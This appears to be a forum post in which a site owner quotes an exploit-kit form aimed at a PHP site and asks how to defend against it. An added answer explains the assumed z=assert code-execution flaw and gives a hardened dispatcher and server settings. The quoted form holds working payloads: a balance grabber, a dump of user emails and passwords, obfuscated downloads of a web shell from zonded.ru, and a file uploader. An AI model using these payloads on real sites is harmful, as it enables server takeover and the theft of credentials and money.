Protection from hacking
slooki1337, 2019-02-09 10:10:55

How to protect yourself from hacking?

There is an index.php file

<?php
session_start();
ob_start();
// If the visitor arrived from another site, remember the referring host in a cookie.
// setcookie() URL-encodes the value, so the Referer header cannot inject extra headers here.
if(isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])){
  $host = parse_url($_SERVER['HTTP_REFERER']);
  $host = $host['host'];
  if ($host != $_SERVER['HTTP_HOST']) {
    $time_cookie = time() + (86400 * 15); // 15 days
    setcookie('httpref', $host, $time_cookie, '/');
  }
}
// Autoloader: class "foo" is loaded from classes/_foo.class.php
// (__autoload() is deprecated since PHP 7.2 and removed in 8.0; spl_autoload_register() replaces it)
function __autoload($name)
{
  require 'classes/_'.$name.'.class.php';
}
$db = new db();
new router($db); // all request handling, including POST, happens inside the router class

On a third-party site there is code of the following form:
<form id="form1" align="center" method="POST" target="_blank">
  <!-- z = name of the PHP function to call, m = its argument (the selected payload) -->
  <input value="assert" name="z" hidden />
  <select name="m" size="7">
      <!-- 0: sets cookie zP=zonded and stops -->
      <option value="setcookie(&quot;zP&quot;, &quot;zonded&quot;, time()+3600);die(&quot;Сookies set&quot;);" selected>Cookie login</option>
      <!-- 1: includes the site's config and rfs_payeer classes and prints the Payeer account balances -->
      <option value="@include(&quot;/_class.config.php&quot;);@include(&quot;/_class.rfs_payeer.php&quot;);$c=new config;$p=new rfs_payeer($c-&gt;AccountNumber,$c-&gt;apiId,$c-&gt;apiKey);if($p-&gt;isAuth()){$z=$p-&gt;getBalance();$t=&quot;&lt;h1&gt;&quot;.$z[&quot;balance&quot;][&quot;RUB&quot;][&quot;DOSTUPNO&quot;].&quot; | &quot;.$z[&quot;balance&quot;][&quot;USD&quot;][&quot;DOSTUPNO&quot;].&quot; | &quot;.$z[&quot;balance&quot;][&quot;EUR&quot;][&quot;DOSTUPNO&quot;].&quot;&lt;/h1&gt;&quot;;die(print($t));}else{die(&quot;&lt;h1&gt;#ERROR&lt;/h1&gt;&quot;);}">1. Balance</option>
      <!-- 2: the chr() chain decodes to "http://zonded.ru/files/p.txt"; its contents are written to p.php
           in the current directory, then the client is redirected with "Location: p.php" -->
      <option value="$u=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(122).chr(111).chr(110).chr(100).chr(101).chr(100).chr(46).chr(114).chr(117).chr(47).chr(102).chr(105).chr(108).chr(101).chr(115).chr(47).chr(112).chr(46).chr(116).chr(120).chr(116);$c=file_get_contents($u);$h=fopen(p.chr(46).php,w);$t=$c;fwrite($h,$t);fclose($h);$h=chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(112).chr(46).chr(112).chr(104).chr(112);@header($h);">2. Grabber money</option>
      <!-- 3: connects with the credentials from classes/_class.config.php and dumps email:pass from db_users_a -->
      <option value="include&quot;/classes/_class.config.php&quot;;$hack=new config;$link=mysql_connect($hack-&gt;HostDB,$hack-&gt;UserDB,$hack-&gt;PassDB);mysql_select_db($hack-&gt;BaseDB,$link);$sql=mysql_query(&quot;SELECT `email`, `pass` FROM `db_users_a`&quot;,$link);while($result = mysql_fetch_array($sql)){echo $result[&quot;email&quot;].&quot;:&quot;.$result[&quot;pass&quot;].&quot;&lt;br&gt;&quot;;}die();">3. Grabber DB</option>
      <!-- 4: same as 2, but fetches "http://zonded.ru/files/z.txt", writes it to z.php and redirects with "Location: z.php" -->
      <option value="$u=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(122).chr(111).chr(110).chr(100).chr(101).chr(100).chr(46).chr(114).chr(117).chr(47).chr(102).chr(105).chr(108).chr(101).chr(115).chr(47).chr(122).chr(46).chr(116).chr(120).chr(116);$c=file_get_contents($u);$h=fopen(z.chr(46).php,w);$t=$c;fwrite($h,$t);fclose($h);$h=chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(122).chr(46).chr(112).chr(104).chr(112);@header($h);">4. Web-shell</option>
      <!-- 5: writes f.php, a minimal file-upload page that copies any uploaded file into the web root -->
      <option value="@$fp=fopen(&quot;f.php&quot;,&quot;w+&quot;);@$test=fwrite($fp,'&lt;form enctype=multipart/form-data method=post&gt;&lt;input name=userfile type=file&gt;&lt;input type=submit name=go_up&gt;&lt;/form&gt;&lt;?print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};?&gt;');@header(&quot;Location: f.php&quot;);">5. Uploader</option>
      <!-- 6: removes the dropped files b.php, z.php and f.php -->
      <option value="@unlink(&quot;b.php&quot;);@unlink(&quot;z.php&quot;);@unlink(&quot;f.php&quot;);die(&quot;good&quot;);">6. zCleaner</option>
  </select>
  <!-- target script on the victim site; the link() script that builds the form action from it is not shown -->
  <input required id="file" class="file1" value="index.php"/><button onclick="link(1)" type="submit">GO</button>
</form>

How to protect yourself from hacks?
With this garbage one can upload a file to the server, then call it from the server, and much more.
It is sent by POST to index.php, but there is no handling of POST in index.php at all. Or is it all about HTTP_REFERER?
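Added example, not part of the original question. The form above pairs z=assert with m=<PHP code>; that only becomes code execution if something on the server calls the function named in z with m as its argument, and the index.php shown does not do that: the referrer block only stores a cookie (setcookie() URL-encodes the value, so a hostile Referer cannot inject headers there), and every request is handed to the router class, which the question does not show. The vulnerable dispatch below is therefore an assumption about what such a router does (it is the classic pattern behind z=assert exploit kits), placed beside a hardened dispatcher. The handler names, the action map and the csrf field are hypothetical.

```php
<?php
// Added example (not the asker's code). The router class is not on the page,
// so dispatch_vulnerable() is an ASSUMPTION about why "z=assert, m=<code>" works.

// --- Vulnerable pattern (assumed; never deploy) ---
function dispatch_vulnerable(array $post): void
{
    // z=assert, m='phpinfo();' becomes assert('phpinfo();'), which on PHP 5/7
    // evaluates the string as code. Any callable name in z works the same way
    // (system, passthru, file_put_contents via call_user_func, ...).
    $fn  = $post['z'] ?? '';
    $arg = $post['m'] ?? '';
    $fn($arg);               // variable function call chosen by the client
}

// --- Hardened pattern ---
// 1. Request data selects an entry in a fixed map; it never names a PHP function.
// 2. The request must carry a CSRF token bound to the session, because the exploit
//    form is hosted on a third-party site and is submitted cross-origin.
const ACTIONS = [           // hypothetical action map
    'login'   => 'action_login',
    'balance' => 'action_balance',
];

function action_login(): string   { return 'login page'; }    // hypothetical handler
function action_balance(): string { return 'balance page'; }  // hypothetical handler

function dispatch_hardened(array $post, array $session): string
{
    $action = $post['action'] ?? '';
    if (!array_key_exists($action, ACTIONS)) {
        http_response_code(400);
        return 'unknown action';
    }
    // hash_equals() is constant-time; empty/absent token fails closed.
    $expected = $session['csrf'] ?? '';
    $given    = $post['csrf'] ?? '';
    if ($expected === '' || !hash_equals($expected, $given)) {
        http_response_code(403);
        return 'bad csrf token';
    }
    return (ACTIONS[$action])();
}

// Stand-alone demo (CLI): session handling is simulated with an array.
if (PHP_SAPI === 'cli') {
    $session = ['csrf' => bin2hex(random_bytes(16))];
    // The exploit form's request: no action, no token -> rejected.
    echo dispatch_hardened(['z' => 'assert', 'm' => 'phpinfo();'], $session), PHP_EOL;
    // A legitimate request carrying the session token.
    echo dispatch_hardened(['action' => 'balance', 'csrf' => $session['csrf']], $session), PHP_EOL;
}
```

Two server-side settings close the rest of the kit regardless of what the router does: with `zend.assertions = -1` in php.ini (the production default since PHP 7) assert() calls are not compiled at all, so a string passed to assert is never evaluated, and `allow_url_fopen = Off` stops payloads 2 and 4 from fetching p.txt/z.txt with file_get_contents(). Payloads 2, 4 and 5 also need the web root writable by the PHP user; keeping it read-only, and checking for p.php, z.php, f.php, b.php and for the cookie zP=zonded in request logs, is the matching clean-up and detection step.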
